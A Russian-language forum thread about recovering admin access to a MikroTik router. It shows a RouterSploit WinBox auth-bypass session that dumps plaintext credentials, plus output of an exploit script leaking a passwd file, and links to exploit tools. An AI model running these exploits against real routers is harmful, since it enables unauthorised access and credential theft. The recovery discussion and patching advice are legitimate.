Восстановление доступа к админке mikrotik

Есть PoC, который позволяет залогиниться в необновленные routeros без указания пароля.
https://habr.com/post/416067/

В 6.41+ это не работает, проверял.

читай сейчас решения нет?

Ресетни и настрой по новой, раньше дыра была, но ее закрыли.

Почему не хочешь ресетнуть? Если нужна непрерывность работы, то настрой другой девайс и временно держи сеть на нем, пока основной не перенастроишь.

не всё так плохо, пишут что версия 6.41.3 уязвима
https://www.securitylab.ru/vulnerability/492892.php

Эксплоита в свободном доступе нет вроде как, думаю что ТС именно его и хочет)

https://gist.github.com/gavz/912e5ad1ebeb0d6cbb5a32d5889c3612
не оно ?
проверить не на чем, т.к. все доступные микротики обновлены.

По факту я не админ, просто временно занял эту дыру, не могу похвастаться большим опытом с RouterOS, к нему подведено два провайдера (настроено автопереключение), разведено несколько роутеров, видеорегистратор с айпи-камерой.. Да и временного девайса, который всё затащит, под рукой нет. По твоим ощущениям - много на это времени понадобится? Не хотелось бы на ночь оставаться...

Вспомнят что что-то ещё прокинуть надо, потом ещё, что-то по-другому настроить..
С минимальными знаниями можно и неделю провозиться.
Если предыдущий админ пропал бесследно, значит денюшкой обидели.

Если опыта нет, то на долго.

если бекапы конфига сохранялись в файлы или на второй раздел - сброс в дефолт их не коснется. просто восстановишься с бэкапа или второго раздела (если он есть)

6.42:

./1.py 
09
LM2����        �       �               �!unknown session id 80 bytes

./1.py 
03
xvM2����        �       1Enobody:*:99:99:nobody:/tmp:/bin/sh
root::0:0:root:/home/root:/bin/sh
122 bytes

хотя не - по умолчанию файлы с бэкапом шифруются паролем админа. так что надежда только на бэкап-раздел флеша

http://stascorp.com/load/1-1-0-56 Через эту прогу удалось на 6.41.3 пароль узнать, удачи: http://images.vfl.ru/ii/1531233392/5d21d4e4/22430810.png

И не забудь обновиться, если все получится

Да уж, похоже 80 недоступен, видит только 8291 винбоксовый С браузера не заходит

логично для этого порта винбокс и использовать.

дело не в этом, сверху на пикче видно - прога не видит креды на 8291, только на 80, а он скипится

Может у тебя web на другом порту висит?

Первое что пришло в голову. Диапазон портов она видеть зачем-то не умеет, в принципе можно прописать диапазон прям руками в файл, страшно правда представить этот диапазон

Сканируй все, роутер твой, никто по голове не настучит

Извиняюсь, не так понял.
Вот что автор пишет:

Открытая вебморда обязательно, даже если порт 8291 открыт а веб-страница нет, эксплойт не работает

80й порт может быть доступен с определенного физического порта,например. так что имеет смысл потыкаться во все, если не поможет - сканировать на наличие открытых портов на всех портах роутера.

в общем, штука скорее всего рабочая, за что log4tmp спасибо, но только с открытым вебом, что по всей видимости, не мой случай http://images.vfl.ru/ii/1531245228/454dd53e/22433401.png

lcd-тач, к стати бесполезен? pin стандартный

У RouterSploit есть эксплойты к mikrotik https://github.com/threat9/routersploit/tree/master/routersploit/modules/expl... но мне сейчас не на чем их проверить тут гайд для новичков: https://hackware.ru/?p=1766

Если найдется незашифрованный бинарный бекап можно из него выцепить логин/пароль

Для сброса пароля - да. Но там можно минимальные настройки интерфейсов произвести.

на одном из wan нужно вместо статического поставить динамический адрес

Не помню, у меня с lcd в работе один девайс и тот в шкафу под потолком. Попробуй сам потыкать в меню Interfaces и посмотреть что там можно настроить.

окей, просто с работы уже ушёл, пока буду лазить, копить варианты

Ну, если до этого настраивал только SOHO-маршрутизации, то трахаться будешь долго. Неделя, месяц... Как-то так.

Обычно LCD все нормальные люди блокируют :).

ТС не заблокировал, посмотрим что у него получится. А вообще согласен, толку от lcd никакого.

Попробовал Routersploit:

rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > show options

Target options:

   Name       Current settings     Description                     
   ----       ----------------     -----------                     
   target                          Target IPv4 or IPv6 address     
   port       8291                 Target WinBox service           


Module options:

   Name          Current settings     Description                           
   ----          ----------------     -----------                           
   verbosity     true                 Enable verbose output: true/false     


rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.10.100
[+] target => 192.168.10.100

rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials

   Username     Password     
   --------     --------     
   test         Ghngt56s+        
   admin                     
   admin        test123        

на микроте(6.41.3) открыт только 8291

Благодаря таким людям, как ты и bdfy я всё еще верю в человечество) Подведя итог: winbox_auth_bypass_creds_disclosure из RouterSploit может вытащить креды микротика по 8291 (что понятно по названию), как минимум из 6.41.3 (это мне и нужно было). Router Scan by Stas'M может вытащить их из вебморды (80), тоже как минимум из 6.41.3. Большое спасибо bdfy за то что пытался помочь, огромная благодарность log4tmp за то что помог. С меня пиво, мужики) P.S. LCD практически бесполезен и абсолютно неудобен, и даже то что он может - проще с ноутбуком подойти и с него сделать...

пытаюсь узнать пароль микротик v6.39.2 8291 закрыт, эксплоит не помог. 80 порт открыт однако толи я рукожоп толи еще что - Router Scan by Stas'M сканирует адрес показывает статус «done» и на этом все, поля логинов паролей пустые. Может я что то делаю не так?

кинь скриншот

http://joxi.ru/L2109e9F8Pkdym

Судя по тому, что у тебя два устройства, возможно на одном из них 80 порт переброшен на второй, на котором прошивка без уязвимости т.к. более новая. Попробуй поискать веб уязвимого микротика на других портах, например 8008, 8080, 8090...

да нет, оба микротика являются шлюзом разных филиалов связанные по l2tp.

т.е. нужный мне действительно с открытым 80м портом и «выше» него только оборудование провайдера.

Выяснил. Для успешной эксплуатации уязвимости этим софтом, открыты должны быть и вебморда и винбокс, причем порт винбокса даже добавлять в сканлист не требуется, сервис просто должен быть включен. По сути роутерсплойт здесь справляется лучше. Так что если только веб, то скорее всего без вариантов.